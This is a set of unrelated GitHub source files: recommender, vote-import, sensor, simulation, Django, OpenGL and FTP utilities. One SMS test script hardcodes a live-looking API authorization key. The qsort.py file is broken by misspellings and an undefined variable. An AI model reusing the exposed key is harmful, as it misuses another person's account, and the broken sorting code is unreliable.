urllib.request,json\n\ndef loadJSON(url): #Loading JSON from Jikan API to get profile information\n\n try:\n with urllib.request.urlopen(url) as url:\n output=json.loads(url.read().decode())\n\n return output\n except urllib.request.HTTPError as err:\n print(err.status)\n if err.status==429:\n output=loadJSON(url)\n return output\n else:\n flask.abort(err.status,'An error has occured :( Please contact me for troubleshooting')\n\ndef load_obj(name ):\n with open('obj/' + name + '.pkl', 'rb') as f:\n return pickle.load(f)\n\ndef anime_names(nums,dict_anime):\n a_arr=[]\n for n in nums:\n a_arr.append(dict_anime[n])\n return a_arr\n\ndef recommendation_n(model,users,crosstab_mat,dict_anime):\n fav=[]\n rec=[]\n for u in users:\n fav.append(anime_names(crosstab_mat.tocsr()[u].indices[:],dict_anime)[:])\n scores = model.predict(u, np.arange(crosstab_mat.shape[1]))\n top_anime = np.argsort(-scores)\n rec.append(anime_names(top_anime,dict_anime)[:])\n return fav,rec\n\ndef make_prediction(username,model,crosstab_mat,dict_anime,dict_user):\n num=list(dict_user.keys())[list(dict_user.values()).index(username)]\n fav,rec=recommendation_n(model,[num],crosstab_mat,dict_anime)\n final=[]\n for n in range(len(rec[0][:])):\n if rec[0][n] not in fav[0]:\n final.append(rec[0][n])\n return(final,fav)\n\ndef json_gen(preds,val):\n json_x={}\n json_x[val]=[]\n info=load_obj(\"anime_info\")\n\n for i in range(len(preds)):\n url=\"https://myanimelist.net/anime/\"+str(preds[i][0])\n index=info[info['anime_id']==preds[i][0]].index.values.astype(int)[0]\n json_x[val].append({\n \"title\":info[\"title\"][index],\n \"image_url\":info[\"image_url\"][index],\n \"anime_url\":url\n })\n\n return json_x\n\ndef fun_profile(username):\n user_url = \"https://api.jikan.moe/v3/user/\" + username\n data_user = loadJSON(user_url)\n\n json_u={}\n json_u[\"profile\"]=[]\n json_u[\"profile\"].append({\"username\":data_user[\"username\"],\n \"profile_url\":data_user[\"url\"],\n \"image_url\":data_user[\"image_url\"],\n \"anime_stats\":data_user[\"anime_stats\"]})\n return json_u\n\n\ndef main(username):\n start = time.time()\n crosstab_mat = load_obj(\"crosstab\")\n dict_user = load_obj(\"dict_user\")\n if username not in dict_user.values():\n end = time.time()\n return 0,end-start,[],[],\"Error username not found or not included in the scaled down version of the data\"\n dict_anime = load_obj(\"dict_anime\")\n\n model = load_obj(\"model\")\n\n f,favs = make_prediction(username,model,crosstab_mat,dict_anime,dict_user)\n final_pred=json_gen(f[:20],\"recs\")\n print(favs)\n favs=json_gen(favs[0][:10],\"favs\")\n profile_json=fun_profile(username)\n end = time.time()\n return (1,end-start,profile_json,final_pred,favs)\n","repo_name":"KKallidromitis/REST-API-for-TV-show-Recommendation","sub_path":"algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"8813981954","text":"import argparse\nimport json\nimport re\nfrom sys import stdout, stderr\nfrom typing import Dict\n\nfrom ranked_vote.format import write_ballots, write_ballots_fh\nfrom ranked_vote_import import FORMATS, NORMALIZERS\n\nTERMINAL_RESET = '\\033[0m'\nTERMINAL_BOLD = '\\033[1m'\nTERMINAL_GREEN = '\\033[92m'\n\nFORMAT_METADATA = TERMINAL_BOLD + TERMINAL_GREEN + ' {}: ' + TERMINAL_RESET + '{}'\n\n\ndef import_rcv_data(input_format, files, output, normalize=False, params: Dict = None):\n if input_format not in FORMATS:\n raise ValueError('Format {} not understood.'.format(input_format))\n\n ballots = reader = FORMATS[input_format](files, params)\n if normalize:\n normalizer = NORMALIZERS[input_format]()\n ballots = (normalizer.normalize(ballot) for ballot in reader)\n\n if output is None:\n print('Writing data to stdout and not writing metadata.', file=stderr)\n write_ballots_fh(stdout, ballots)\n meta_file = None\n else:\n write_ballots(output, ballots)\n meta_file = re.sub(r'\\.csv(\\.gz)?$', '', output) + '.json'\n\n metadata = reader.get_metadata()\n metadata['normalized'] = normalize\n\n if meta_file is not None:\n with open(meta_file, 'w') as meta_fh:\n json.dump(metadata, meta_fh, sort_keys=True, indent=2)\n\n print(TERMINAL_BOLD + TERMINAL_GREEN + 'Done Converting.' + TERMINAL_RESET, file=stderr)\n for mk, mv in metadata.items():\n if isinstance(mv, list):\n print(FORMAT_METADATA.format(mk, ''), file=stderr)\n for item in mv:\n print(' ' + str(item), file=stderr)\n else:\n print(FORMAT_METADATA.format(mk, mv), file=stderr)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('input_format')\n parser.add_argument('files', nargs='+')\n parser.add_argument('--normalize', action='store_true')\n parser.add_argument('--params', type=json.loads, default=dict())\n parser.add_argument('-o', '--output')\n\n import_rcv_data(**vars(parser.parse_args()))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ranked-vote/ranked-vote-import","sub_path":"ranked_vote_import/bin/import_rcv_data.py","file_name":"import_rcv_data.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27679689018","text":"from psistats.libsensors.lib.sensors import init\nfrom psistats.libsensors.lib.sensors import iter_detected_chips\nfrom psistats.libsensors.lib.sensors import cleanup\nfrom psistats.libsensors.lib.sensors import SENSORS_FEATURE_FAN\nfrom psistats.libsensors.lib.sensors import SENSORS_FEATURE_TEMP\nfrom psistats.libsensors.lib.sensors import SensorsError\n\n__all__ = ['Sensors', 'CantReadSensor']\n\nclass CantReadSensor(SensorsError):\n \"\"\"Thrown when a sensor can not be read\"\"\"\n def __init__(self, *args, **kwargs):\n SensorsError.__init__(self, *args, **kwargs)\n\n\nclass Sensors(object):\n \"\"\"Simple abstraction over libsensors\"\"\" \n def __init__(self):\n self.chips = {}\n self.initted = False\n\n def init(self):\n \"\"\"Initialize sensors\"\"\"\n init()\n self.initted = True\n\n def cleanup(self):\n \"\"\"Cleanup after using sensors\"\"\"\n cleanup()\n self.initted = False\n \n def add_chip(self, chipName):\n \"\"\"Add a chip\"\"\"\n for chip in iter_detected_chips(chip_name=chipName):\n self.chips[chipName] = {}\n\n for feature in chip:\n self.chips[chipName][feature.label] = feature\n\n def _get_unit(self, feature):\n if feature.type == SENSORS_FEATURE_FAN:\n return 'rpm'\n elif feature.type == SENSORS_FEATURE_TEMP:\n return 'c'\n else:\n return None\n\n\n def get_value(self, chipName, featureLabel):\n \"\"\"Get a value of a specific feature from a chip\"\"\"\n try:\n if chipName in self.chips:\n if featureLabel in self.chips[chipName]:\n feature = self.chips[chipName][featureLabel]\n \n return (feature.get_value(), self._get_unit(feature))\n except SensorsError as e:\n if str(e) == \"Can't read\":\n raise CantReadSensor(featureLabel)\n","repo_name":"psistats/linux-client","sub_path":"psistats/libsensors/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"73497714008","text":"import multiprocessing\r\nfrom scipy.optimize import least_squares\r\nimport matplotlib.pyplot as plt\r\nfrom Eq_balance import balance\r\nimport numpy as np\r\nimport time\r\nplt.rcParams[\"font.size\"] = 20\r\nplt.rcParams[\"font.family\"] = \"Times New Roman\"\r\nplt.rcParams[\"figure.dpi\"] = 320\r\n\r\ndef main():\r\n start_time = time.time()\r\n file_list =[\r\n './exp_data/res/2022-12-26/GL840_01_No3_2022-12-26_15-44-03.csv'\r\n ]*4\r\n\r\n #start_list = [17100,18000,18950,19600,20300,21300,22300,23100]\r\n start_list = [18000,18950,19600,20300]\r\n params = [62.69737115, 0.07982275, 0.41252353]\r\n\r\n params = np.array([10, 0.07855777, 0.38171265])\r\n params = fitting_param(params, file_list,start_list)\r\n compare_all(params, file_list,start_list)\r\n print(' 計算時間 ',(time.time() - start_time)/3600,' 時間')\r\n\r\n\r\n# curve fitting\r\ndef fitting_param(corr0, file_, time_):\r\n bound = ([5, 0.003, 0.1],[100, 0.3,3])\r\n xscales = [5,0.01, 0.02]\r\n res_perf = least_squares(lsq_fit_multi,corr0, bounds=bound, verbose = 1,method='trf',x_scale=xscales,args=(file_,time_))\r\n fitted_params = res_perf.x\r\n print(fitted_params)\r\n return fitted_params\r\n\r\n\r\n# give params and calc simulation results\r\ndef param_set(system, corr):\r\n system.h_CO2 = corr[0]\r\n system.K1_LDF = corr[1]\r\n system.k_water = corr[2]\r\n\r\n system.simulation_time = 120\r\n system.set_dependant_var_IC()\r\n return system\r\n\r\n\r\n# run lsq for many cases\r\ndef lsq_fit(corr,res_list, time_list):\r\n diff_all = []\r\n for i in range(len(res_list)):\r\n diff_all.extend(diff_sim_exp(corr, res_list[i],time_list[i]))\r\n return diff_all\r\n\r\n\r\n# run lsq for many cases with multi process calculation\r\ndef lsq_fit_multi(corr,res_list, time_list):\r\n proc = []\r\n proc_answer = []\r\n # prepare the multi process\r\n for i in range(len(res_list)):\r\n get_rev,send_rev = multiprocessing.Pipe(False)\r\n t = multiprocessing.Process(target=diff_sim_exp,args=(corr, res_list[i],time_list[i],send_rev))\r\n proc_answer.append(get_rev)\r\n t.start()\r\n proc.append(t)\r\n \r\n # 計算実行\r\n for i in range(len(proc)):\r\n proc[i].join()\r\n \r\n # 結果の取得\r\n diff_all = []\r\n for i in range(len(proc)):\r\n diff_all.extend(proc_answer[i].recv())\r\n return diff_all\r\n\r\n\r\n# calculate the difference between experiment and simulation with given params\r\ndef diff_sim_exp(corr,res_exp,start_sec,send_rev):\r\n mof_type = 'Uio-66'\r\n system = balance(mof_type,res_exp,start_sec)\r\n\r\n # set parameters and solve it\r\n system = param_set(system, corr)\r\n system.solver()\r\n\r\n # experimental data\r\n exp_temp_sor = system.res_exp.d_loc('sorbent')\r\n #exp_temp_gas = system.res_exp.d_loc(\"CO2 outlet\")\r\n exp_temp_water = system.res_exp.d_loc(\"water outlet\")\r\n \r\n # comparison of exp and sim\r\n dT_sor = []; dT_water = [];dT_gas = []\r\n for t in range(int(max(system.t))):\r\n sim_index = np.where(system.t.astype(int)==t)[0][0]\r\n exp_index = np.where(system.res_exp.time_line==t)[0][0]\r\n\r\n #dT_gas.append(relative_diff(system.gas_T_list[sim_index], exp_temp_gas.iloc[exp_index]))\r\n dT_sor.append(relative_diff(system.mof_T_list[sim_index], exp_temp_sor.iloc[exp_index]))\r\n dT_water.append(relative_diff(system.T_HTF_list[sim_index], exp_temp_water.iloc[exp_index]))\r\n\r\n # ratio of importanec of parameters\r\n #dT_gas = np.array(dT_gas) * 1.0\r\n #dT_sor = np.array(dT_sor) * 1.0\r\n dT_water = np.array(dT_water) * 1.0\r\n # return the difference \r\n #diff_sim = np.concatenate((dT_water, dT_sor), axis = 0)\r\n diff_sim = dT_water\r\n send_rev.send(diff_sim)\r\n return diff_sim\r\n\r\n\r\n\r\n# return relative difference\r\ndef relative_diff(data_sim, data_exp):\r\n data_sim = float(data_sim) # K\r\n data_exp = float(data_exp) + 273.15 # modify celcius to kelvin\r\n error = abs((data_sim - data_exp))\r\n return error\r\n\r\n\r\n# make a graph for each case\r\ndef compare_all(params, res_list,time_list):\r\n for i in range(len(res_list)):\r\n tot_Q_w = compare_temp(params, res_list[i],time_list[i],i+1)\r\n print('num : ',i+1,' ', tot_Q_w, ' J ')\r\n\r\n\r\n# compare the temperatures from simulation adn experiment\r\ndef compare_temp(params, file,start,num):\r\n mof_type = 'Uio-66'\r\n\r\n System = balance(mof_type,file,start)\r\n param_set(System, params)\r\n tot_Q = System.solver()\r\n\r\n fig = plt.figure(figsize=(8,5))\r\n ax_T = fig.add_subplot(1,1,1)\r\n\r\n # simulation plot\r\n sim_legends = ['water(sim)']\r\n sim_temp_data = [System.T_HTF_list-273.15]\r\n for i in range(len(sim_temp_data)):\r\n ax_T.plot(System.t, sim_temp_data[i], label = sim_legends[i],linewidth = 2)\r\n\r\n\r\n # experimental data\r\n exp_temp_sor = System.res_exp.d_loc('sorbent')\r\n #exp_temp_gas = System.res_exp.d_loc(\"CO2 outlet\")\r\n exp_temp_water = System.res_exp.d_loc(\"water outlet\")\r\n exp_legends = ['water(exp)']\r\n exp_temp_data = [exp_temp_water]\r\n markers = ['s']\r\n for i in range(len(exp_temp_data)):\r\n ax_T.scatter(System.res_exp.time_line, exp_temp_data[i], label = exp_legends[i], marker=markers[i], s=15, edgecolors='k')\r\n ax_T.set_xlabel(' t sec')\r\n ax_T.set_ylabel(' T ℃')\r\n ax_T.set_xlim(-1,System.t[-1])\r\n ax_T.legend()\r\n ax_T.grid(axis='both')\r\n fig.savefig('./Fig/temp_compare_'+str(start)+'.png')\r\n return tot_Q\r\n\r\n\r\nif __name__=='__main__':\r\n main()","repo_name":"Cinebou/HCA_HP_lumped","sub_path":"curve_fit_param.py","file_name":"curve_fit_param.py","file_ext":"py","file_size_in_byte":5456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1256402835","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.http import JsonResponse,HttpResponse\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework import status\n\nfrom tutorials.models import Tutorials\nfrom tutorials.serializers import TutorialsSerializer\nfrom rest_framework.decorators import api_view\n\n@api_view(['GET','POST','DELETE'])\ndef tutorials_list(request):\n if request.method=='GET':\n tutorials=Tutorials.objects.all() # object 已经失效需要更正为 =>objects\n #objects 代表将一个模型转换为字典\n title=request.query_params.get('title',None)\n if title is not None:\n tutorials=tutorials.filter(title=title)\n tutorials_serializer=TutorialsSerializer(tutorials,many=True)\n print(tutorials_serializer.data)\n return JsonResponse(tutorials_serializer.data,safe=False,json_dumps_params={'ensure_ascii':False})\n \n elif request.method=='POST':\n tutorial_data=JSONParser().parse(request)\n tutorials_serializer=TutorialsSerializer(data=tutorial_data)\n if tutorials_serializer.is_valid():\n tutorials_serializer.save()\n return JsonResponse(tutorials_serializer.data,status=status.HTTP_201_CREATED)\n return JsonResponse(tutorials_serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n \n elif request.method=='DELETE':\n count=Tutorials.objects.all().delete()\n return JsonResponse({'message':'{} Tutorials were deleted successfully'.format(count[0])},status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef tutorial_detail(request, title):\n print('#'*90)\n print(type(title))\n try: \n tutorials = Tutorials.objects.get(title=title) \n except Tutorials.DoesNotExist: \n return JsonResponse({'message': 'The Tutorials does not exist'}, status=status.HTTP_404_NOT_FOUND) \n\n if request.method == 'GET': \n tutorial_serializer = TutorialsSerializer(tutorials) \n return JsonResponse(tutorial_serializer.data) \n\n elif request.method == 'PUT': \n tutorial_data = JSONParser().parse(request) \n tutorial_serializer = TutorialsSerializer(tutorials, data=tutorial_data) \n if tutorial_serializer.is_valid(): \n tutorial_serializer.save() \n return JsonResponse(tutorial_serializer.data) \n return JsonResponse(tutorial_serializer.errors, status=status.HTTP_400_BAD_REQUEST) \n\n elif request.method == 'DELETE': \n tutorials.delete() \n return JsonResponse({'message': 'Tutorials was deleted successfully!'}, status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET'])\ndef tutorial_list_published(request):\n tutorials = Tutorials.objects.filter(published=True)\n\n if request.method == 'GET': \n tutorials_serializer = TutorialsSerializer(tutorials, many=True)\n return JsonResponse(tutorials_serializer.data, safe=False)","repo_name":"zheng013/restful_django_restframework_demo","sub_path":"tutorials/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24402887039","text":"\ns = input(\"enter numbers:\\n\")\nn = list(map(int, s.split()))\n\ndef quick_sort(n):\n\tquick_sort2(n, 0, len(n)-1)\n\t\ndef quick_sort2(n, low, hi):\n\tif low < hi:\n\t\tp = pnrtition(n, low, hi)\n\t\tquick_sort2(n, low, p - 1)\n\t\tquick_sort2(n, p + 1, hi)\n\t\ndef get_pivot(n, low, hi):\n\tmid = (hi + low) // 2\n\ts = sorted([n[low], n[mid], n[hi]])\n\tif s[1] == n[low]:\n\t\treturn low\n\telif s[1] == n[mid]:\n\t\treturn mid\n\treturn hi\n\t\ndef pnrtition(n, low, hi):\n\tpivotIndex = get_pivot(n, low, hi)\n\tpivotVnlue = n[pivotIndex]\n\tn[pivotIndex], n[low] = n[low], n[pivotIndex]\n\tborder = low\n\n\tfor i in range(low, hi+1):\n\t\tif n[i] < pivotVnlue:\n\t\t\tborder += 1\n\t\t\tn[i], n[border] = n[border], n[i]\n\tn[low], n[border] = n[border], n[low]\n\n\treturn (border)\n\t\ndef quick_selection(x, first, lnst):\n\tfor i in range (first, lnst):\n\t\tminIndex = i\n\t\tfor j in rnnge (i+1,lnst+1):\n\t\t\tif x[j] < x[minIndex]:\n\t\t\t\tminIndex = j\n\t\tif minIndex != i:\n\t\t\tx[i], x[minIndex] = x[minIndex], x[i]\n\t\t\t\n\nprint (\"Sorted nrrny:\")\nfor i in rnnge(len(B)):\n print (\"%d\" %B[i]) ","repo_name":"tejas2008/Pycodes","sub_path":"python codes/sorting codes/qsort.py","file_name":"qsort.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74941295127","text":"\nclass Solution:\n def binaryGap(self, N: int) -> int:\n index = [i for i, v in enumerate(bin(N)) if v == '1']\n result = 0\n length = len(index) -1\n \n for i, val in enumerate(index):\n \n if i != length:\n diff = index[i + 1] - val \n \n if diff > result:\n result = diff\n\n\n return result\n\n\n","repo_name":"jay51/wallbreakers","sub_path":"week1/binary_gap.py","file_name":"binary_gap.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34551046712","text":"import numpy as np\nimport cv2\nimport random\nimport tensorflow.compat.v1 as tf\nimport sys\nimport os\nimport glob\nimport time\nimport math\ntry:\n sys.path.append(glob.glob('/home/user/carla/PythonAPI/carla/dist/carla-*%d.%d-%s.egg' % (\n sys.version_info.major,\n sys.version_info.minor,\n 'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])\nexcept IndexError:\n pass\n\nimport carla\nfrom actor import Actor\nfrom shapely.geometry import Polygon\nfrom controller import PIDLongitudinalController, PIDLateralController\nfrom safetypotential import SafetyPotential\n\nclient = carla.Client('127.0.0.1', 2000)\nclient.set_timeout(10.0)\n\n\ntry:\n world = client.get_world()\n\n traffic_manager = client.get_trafficmanager(8000)\n traffic_manager.set_global_distance_to_leading_vehicle(2.5)\n traffic_manager.set_synchronous_mode(True)\n\n settings = world.get_settings()\n settings.synchronous_mode = True\n settings.fixed_delta_seconds = 0.05\n settings.no_rendering_mode = True\n world.apply_settings(settings)\n\n actor = Actor(world, client)\n latcontroller = PIDLateralController(K_P = 1.95, K_I = 0.05, K_D = 0.2, dt=0.05)\n loncontroller = PIDLongitudinalController(K_P = 1.0, K_I = 0.05, K_D = 0., dt=0.05)\n sff = SafetyPotential(world, world.get_map())\n\n tf.disable_eager_execution()\n sess = tf.Session()\n with sess.as_default():\n for exp in [4]:\n log_file = open(\"policy_test_log/sff_policy_\" + str(exp) + \".txt\", \"wt\")\n log_file.write(\"Iteration\\tSurvive_Time\\tScore\\n\")\n for iteration in range(25):\n actor.reset()\n sff.Assign_Player(actor.player)\n sff.Assign_NPCS(actor.npc_vehicle_actors)\n for a in actor.npc_vehicle_actors:\n traffic_manager.ignore_lights_percentage(a, 5.0 * exp)\n traffic_manager.ignore_vehicles_percentage(a, 0.5 * exp)\n world.tick()\n world.tick()\n world.tick()\n world.tick()\n world.tick()\n success = 0\n accel, brake, steer = 1.0, 0.0, 0.0\n for step in range(5000):\n ret = actor.step([accel, brake, steer])\n world.tick()\n if ret[\"collision\"]:\n break\n if ret[\"success_dest\"]:\n success += 1\n\n target_velocity = sff.get_target_velocity(actor.route)\n\n acceleration = loncontroller.run_step(target_velocity, ret[\"velocity\"]) \n if acceleration >= 0.0:\n accel = min(acceleration, 0.75)\n brake = 0.0\n else:\n accel = 0.0\n brake = min(abs(acceleration), 0.3)\n\n\n steer = latcontroller.run_step(actor.route[2][0].transform, actor.player.get_transform())\n\n for a in actor.npc_vehicle_actors:\n r = random.random()\n if r < 0.001 * exp * exp:\n traffic_manager.force_lane_change(a, True)\n elif r < 0.002 * exp * exp:\n traffic_manager.force_lane_change(a, False)\n\n print(str(iteration) + \"\\t\" + str(step + 1) + \"\\t\" + str(success) + \"\\n\")\n log_file.write(str(iteration) + \"\\t\" + str(step + 1) + \"\\t\" + str(success) + \"\\n\")\nfinally:\n settings = world.get_settings()\n settings.synchronous_mode = False\n settings.no_rendering_mode = False\n world.apply_settings(settings)\n\n actor.destroy()\n\n time.sleep(0.5)\n\n\n","repo_name":"boratw/carla-sff","sub_path":"test_basic/test_sff_policy.py","file_name":"test_sff_policy.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"71540249369","text":"import requests\n\nurl = \"https://www.fast2sms.com/dev/bulkV2\"\n\nquerystring = {\n \"authorization\":\"x1T7Cwp6gsQLEZOvY2HoXU34JSPiKWNIeqhBAcfGV90kzldRMtkNM7Fu0R4LYZW9w1BsiEPnpldTSxXa\",\n \"message\":\"This is test message from canceRX\",\n \"language\":\"english\",\n \"route\":\"q\",\n \"numbers\":\"7992381406\"\n }\n\nheaders = {\n 'cache-control': \"no-cache\"\n}\n\nresponse = requests.request(\"GET\", url, headers=headers, params=querystring)\n\nprint(response.json()[\"return\"])\n","repo_name":"Rana1005/cenceRX","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74428274008","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom time import sleep\nimport sys\nimport array\nfrom OpenGL.GLUT import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\n\nvertices = array.array('f', [-1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, 1,\n -1, -1, -1, -1, 1, -1, 1, 1, -1, 1, -1, -1])\n\ncolors = array.array('f', [0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0,\n 0, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1])\n\ncIndices = array.array('B', [0, 3, 2, 1, 2, 3, 7, 6, 0, 4, 7, 3,\n 1, 2, 6, 5, 4, 5, 6, 7, 0, 1, 5, 4])\n\nanimationAngle = 0.0\nframeRate = 25\n\n\ndef animationStep():\n global animationAngle\n global frameRate\n animationAngle += 2\n while animationAngle > 360:\n animationAngle -= 360\n sleep(1 / float(frameRate))\n glutPostRedisplay()\n\n\ndef display():\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glOrtho(-2, 2, -2, 2, -2, 2)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n glRotatef(animationAngle, 1, 1, 1)\n glEnableClientState(GL_COLOR_ARRAY)\n glEnableClientState(GL_VERTEX_ARRAY)\n glColorPointer(3, GL_FLOAT, 0, colors.tobytes())\n glVertexPointer(3, GL_FLOAT, 0, vertices.tobytes())\n glDrawElements(GL_QUADS, 24, GL_UNSIGNED_BYTE, cIndices.tobytes())\n glDisableClientState(GL_COLOR_ARRAY)\n glDisableClientState(GL_VERTEX_ARRAY)\n glutSwapBuffers()\n\n\ndef init():\n if not (glColorPointer and glVertexPointer and glDrawElements):\n print(''' Error: no vertex array support''')\n sys.exit()\n glClearColor(0, 0, 0, 0)\n glEnable(GL_DEPTH_TEST)\n glShadeModel(GL_SMOOTH)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_DOUBLE | GLUT_RGB | GLUT_DEPTH)\n glutInitWindowSize(250, 250)\n glutInitWindowPosition(100, 100)\n glutCreateWindow(sys.argv[0])\n init()\n glutDisplayFunc(display)\n glutIdleFunc(animationStep)\n glutMainLoop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ismaelxyz/graphic-concentration","sub_path":"DemOpenGL/proesch/color_cube/color_cube.py","file_name":"color_cube.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"9807337088","text":"import CSVparsing as parser\nimport ftp_connect as FTP\nimport os\nimport shutil\n\n#Code was collaborated and written together by Harry S, Sunil S\nclass runCmdline():\n\n def __init__(self):\n self.outputList=[] #show list for possible files for a specific date\n self.choiceCond=True\n\n def decisionTree(self):\n #main menu for command line application\n while self.choiceCond:\n print(\"---------\\nMain Menu\\n---------\\n\")\n print(\"Option 1: Select Date to view files (1)\")\n print(\"Option 2: Open Specific File (2)\")\n print(\"Option 3: Quit (3)\\n\")\n self.uChoice=str(input(\">: \"))\n #keeps tracks of user input and provides service based on input\n if self.uChoice==\"1\":\n self.dateChoice=str(input(\"Enter Date to view files in (YYYYMMDD) Format\\n>: \"))\n self.dateFileView(self.dateChoice) #function call\n self.uChoice=False #to exit the WHILE loop\n exit(0) #end program execution\n elif self.uChoice==\"2\":\n self.uChoice=str(input(\"Please Enter Specific Filename to View (MED_DATA_YYYYMMDDHHMMSS.csv) >: \"))\n self.specificFile(self.uChoice) #function call\n self.uChoice = False\n exit(0)\n elif self.uChoice==\"3\":\n exit(0)\n else:\n print(\"Enter Valid Data\\n\") #erroneous input\n\n\n def dateFileView(self,date):\n try:\n testCast=int(date) #tests if input is a date\n except:\n print(\"Wrong Data Format\") #otherwise it is rejected\n exit(0)\n try:\n self.itemList = FTP.ftp_fetch() # validation to check if there is a connection to FTP\n except:\n print(\"Couldn't connect to FTP Server, is config up to date? or is server running?\")\n exit(0)\n for items in self.itemList:\n if parser.validateFilename(items):\n if date in str(items):\n os.makedirs(\"tempFTPDownload/\", exist_ok=True)\n FTP.ftp_pull(items, \"tempFTPDownload/\" + str(items))\n if parser.masterValidate(\"tempFTPDownload/\",items): # Validates all files before adding them to Show List\n os.makedirs(\"FTPDownload/\" + str(date[:4]) + \"/\" + str(date[4:6]) + \"/\" + str(date[6:8]), exist_ok=True)\n self.outputList.append(items)\n\n if len(self.outputList) != 0:\n for files in self.outputList:\n os.rename(\"tempFTPDownload/\" + files,\"FTPDownload/\"+files[9:13]+\"/\"+files[13:15]+\"/\"+files[15:17]+\"/\"+files)\n shutil.rmtree(\"tempFTPDownload\")\n\n print(\"The Files for that current day are:\")\n for file in self.outputList:\n print(file)\n\n self.uChoice=str(input(\"Enter File to View >: \"))\n if self.uChoice not in self.itemList: #if filename not found in displayed list\n print(\"Wrong Filename\")\n exit(0)\n else:\n parser.outputNiceCsv(self.uChoice,\"FTPDownload/\"+self.uChoice[9:13]+\"/\"+self.uChoice[13:15]+\"/\"+self.uChoice[15:17]+\"/\") #object method call to print csv in console\n\n def specificFile(self,filename):\n try:\n self.itemList = FTP.ftp_fetch() # validation to check if there is a connection to FTP\n except:\n print(\"Couldn't connect to FTP Server, is config up to date? or is server running?\")\n exit(0)\n if filename in self.itemList:\n FTP.ftp_pull(filename, \"tempFTPDownload/\" + str(filename))\n if parser.masterValidate(\"tempFTPDownload/\", filename): # Validates all files before adding them to Show List\n parser.outputNiceCsv(self.uChoice, \"tempFTPDownload/\")\n else:\n print(\"Invalid Datafile on FTP Server\") #if file cannot be found in file downloaded from FTP server\n exit(0)\n else:\n print(\"Wrong Filename\")\n exit(0)\n\nif __name__==\"__main__\":\n cmdRunObj=runCmdline()\n cmdRunObj.decisionTree()\n","repo_name":"SSName1/FTP-Project","sub_path":"launchCmdline.py","file_name":"launchCmdline.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20982829193","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nimport logging\nimport os\n\nimport uiautomator2 as u2\nfrom git import Repo\n\nfrom common import project_dir\nfrom common.config_parser import ReadConfig\n\nplatform = ReadConfig().get_platform\n\n\ndef get_android_version() -> int:\n android_version = os.popen(\"adb shell getprop ro.build.version.release\").read().split(\".\")[0]\n logging.info(\"current android version is: {}\".format(android_version))\n return int(android_version)\n\n\ndef get_installed_package_name() -> str:\n package_name = None\n for package in ReadConfig().get_package_name:\n package_info = os.popen(\"adb shell \\\"pm list packages |grep \" + package + \"\\\"\").read()\n if package_info is not None:\n package_name = package\n break\n if package_name is None:\n raise RuntimeError(\"can not find package: {}\".format(package_name))\n return package_name\n\n\ndef install_app(file_path):\n logging.info(\"install app path: {}\".format(file_path))\n try:\n if platform == \"android\":\n os.popen(\"adb install -d -r \" + file_path)\n d = u2.connect()\n d.unlock()\n if get_android_version() >= 10:\n logging.info(\"install app finished\")\n return\n element = d(text=\"重新安装\")\n if element.wait(timeout=10.0):\n element.click()\n d.click(0.75, 0.95) # 点击安装(比例定位)\n element = d(textContains=\"安装完成\")\n if element.wait(timeout=20.0):\n d.click(0.25, 0.95) # 点击完成(比例定位)\n elif platform == \"ios\":\n pass\n logging.info(\"install app finished\")\n except Exception as e:\n logging.error(\"install app failed: {}\".format(e))\n raise\n\n\ndef git_pull():\n repo = Repo(project_dir)\n repo.remote().pull()\n","repo_name":"ranyong1997/Auto_Uiautomator2","sub_path":"common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34738332493","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right 